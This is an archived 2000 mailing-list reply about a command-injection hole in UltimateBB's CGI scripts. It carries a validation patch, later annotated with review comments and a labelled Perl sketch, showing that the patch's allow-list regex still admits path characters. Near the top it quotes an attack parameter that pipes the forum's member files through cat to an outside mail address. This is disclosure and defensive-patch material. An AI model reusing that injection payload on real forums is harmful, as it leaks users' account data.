Re: perl-cgi hole in UltimateBB by Infopop Corp.

From: Jordan Ritter (jpr5at_private)
Date: Tue Feb 15 2000 - 17:47:40 PST


    On Mon, 14 Feb 2000, Kevin Hillabolt wrote:
    
    # It works on the full version also...
    #
    # Little different syntax:
    # topic=012345.cgi|cat%20../Members/*|mail hackerat_private|
    # (note the ../ on the Members.  You have to go up a directory to get the
    # file.  Maybe you could stop it via simple folder permissions??)
    
    Provided with no warranty.  unescape() borrowed from the far superior
    CGI.pm.  It appears to work, but I haven't checked it for completeness.
    The ubb scripts are a programming disaster, and pass around metachars and
    filenames through form parameters, making input validation difficult.
    The patch below selectively validates input based on the name of the
    variable we're validating (i.e. only certain variables are dangerous;
    others are just dumb and not a risk).  It's better to try and validate at
    the top level than code review the source and try to patch every idiotic
    mistake that was made.  At the very least, this stops the specific attack
    that was posted.  There could be other holes that this doesn't cover, or
    alternative ways to carry out the same attack.  Hopefully Infopop will get
    their act together soon.
    
    I can't believe they distribute this crap as commercial software.
    Actually, what I can't believe is how many people paid for it.  God help
    us all.
    
    
    --jordan
    
    
    $ diff ubb_library.pl ubb_library.pl.orig
    84,93d83
    < # unescape URL-encoded data
    < sub unescape {
    <     shift() if ref($_[0]);
    <     my $todecode = shift;
    <     return undef unless defined($todecode);
    <     $todecode =~ tr/+/ /;       # pluses become spaces
    <     $todecode =~ s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;
    <     return $todecode;
    < }
    <
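    Review bot: the new sub carries no comment on where it came from or how it is meant to be used; the message body says it is copied from CGI.pm and that the decoded value is used only for the validation check (the still-encoded `$val` is what gets passed on), so say that above `sub unescape` before someone replaces it with a decoder that behaves differently. Also, `pack("c",hex($1))` uses the signed format, which under `-w` warns "Character in 'c' format wrapped" for bytes 0x80 and above; `pack("C", hex($1))` is the unsigned equivalent.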
    1047a1038
    >
    1112,1120d1102
    <       # clean input
    <     if ($key =~ /^(forum|topic|number|replynum)$/i) {
    <         my($newval) = &unescape($val);
    <
    <         if ($newval !~ /^([ -\@\w.]+)$/) {
    <             $val = "bad_input";
    <         }
    <     }
    <
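    Review bot: the allow-list in `if ($newval !~ /^([ -\@\w.]+)$/)` has an unescaped hyphen, so ` -\@` is a range from space (0x20) to `@` (0x40) and admits `/`, `;`, `&`, `$`, `%`, `<`, `>`, `*` and the parentheses; only `|` and the other characters above `@` are excluded, which is why this stops the pipe in the quoted report while the `../Members` traversal in the same report still passes (`.` is in the class and `/` is in the accidental range). Put the hyphen last or escape it, e.g. `/^[\w .\@-]+$/`, and consider rejecting the request with an error instead of substituting `bad_input`, which is then handed on as an ordinary value.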
    1266,1284d1247
    <
    < my(@out);
    < foreach $row (@in) {
    <     my($name,$value) = split ("=", $row);
    <
    <     if ($name =~ /^(forum|topic|number|replynum)$/i) {
    <         my($newvalue) = &unescape($value);
    <
    <         if ($newvalue !~ /^([ -\@\w.]+)$/) {
    <             $value = "bad_input";
    <         }
    <
    <         push @out, "$name=$value";
    <      } else {
    <         push @out, $row;
    <      }
    < }
    <    @in = @out;
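    Review bot: this block duplicates the key list and the allow-list regex from the hunk at 1112 (with the same unescaped-hyphen range), so the two copies will drift apart on the next fix; factor them into one sub and call it from both places. `split ("=", $row)` has no limit, so a value that itself contains `=` loses everything after the second `=` when the pair is rebuilt as `"$name=$value"`; use `split("=", $row, 2)`. `$row` is also not declared with `my`, which will break the moment `use strict` is turned on.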
    

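Added example, not from the posted patch or from Infopop's code: a stand-alone Perl sketch of the top-level, name-keyed validation the post describes, with the allow-list written so the hyphen is literal, run against two constructed query strings. `clean_params`, `%dangerous`, the two regexes and the sample inputs are assumptions for illustration.

```perl
#!/usr/bin/perl
# Added example, not part of the posted ubb patch: validate the form
# parameters the patch singles out, with the allow-list written as intended.
use strict;
use warnings;

# Same decoding as the patch's unescape(); 'C' (unsigned) avoids the
# "wrapped" warning that 'c' gives for bytes >= 0x80.
sub unescape {
    my ($s) = @_;
    return undef unless defined $s;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9a-fA-F]{2})/pack("C", hex($1))/ge;
    return $s;
}

# Parameter names the patch treats as reaching filenames or commands.
my %dangerous = map { $_ => 1 } qw(forum topic number replynum);

# Patch's class: the unescaped '-' makes ' -\@' a range from 0x20 to 0x40,
# which admits '/', ';', '&', '$', '%', '<', '>' and '*'.
my $patched_ok  = qr/^[ -\@\w.]+$/;
# Intended class: word chars, space, '.', '@' and a literal '-' (placed last).
my $intended_ok = qr/^[\w .\@-]+$/;

# Decodes a query string into a hash; dies instead of substituting a
# placeholder when a dangerous parameter fails the allow-list.
sub clean_params {
    my ($query, $re) = @_;
    my %out;
    for my $pair (split /&/, $query) {
        my ($name, $value) = split /=/, $pair, 2;   # limit 2 keeps '=' in values
        $value = unescape($value // '');
        die "bad input in '$name'\n" if $dangerous{lc $name} && $value !~ $re;
        $out{$name} = $value;
    }
    return \%out;
}

# Constructed inputs: a normal topic id, and one with an encoded '/'.
for my $q ('topic=000123.cgi&ubb=get_topic', 'topic=..%2Fother%2F000123.cgi') {
    for my $case (['patched', $patched_ok], ['intended', $intended_ok]) {
        my ($label, $re) = @$case;
        my $ok = eval { clean_params($q, $re) };
        my $err = $@; chomp $err;
        printf "%-8s %-32s %s\n", $label, $q, $ok ? 'accepted' : "rejected ($err)";
    }
}
```

The second input is accepted by the patch's class and rejected by the intended one, which is the difference the unescaped hyphen makes.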


    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:35:17 PDT